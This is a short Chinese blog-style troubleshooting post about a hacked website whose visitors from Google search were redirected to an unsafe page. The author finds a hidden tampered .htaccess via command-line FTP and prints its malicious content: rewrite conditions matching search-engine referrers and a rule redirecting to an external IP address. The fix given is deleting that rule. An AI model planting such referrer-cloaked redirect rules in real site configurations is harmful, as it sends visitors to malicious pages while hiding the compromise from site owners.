最近一个朋友碰到一个很奇怪的问题。
他的一个网站直接通过域名访问完全没有问题。
但是如果从google搜索得到的结果点击之后就会跳转到一个不安全的页面中去。
从百度的也正常。
对这个网站进行分析过之后发现这个网站的代码完全没有问题。
后来分析网站确定为网站的.htaccess被篡改导致的。
可是通过FTP文件没有在改网站目录下面找到。
后来通过命令模式登陆ftp
ls -a命令得到在最上层目录上有个.htaccess。
使用 get命令下载该文件后发现,有异常代码
- RewriteEngine On
- RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
- RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
- RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
- RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
- RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
- RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
- RewriteRule .* http://87.248.180.90/in.html?s=ipw2 [R,L]
删除RewriteRule这条记录。上传覆盖文件即可。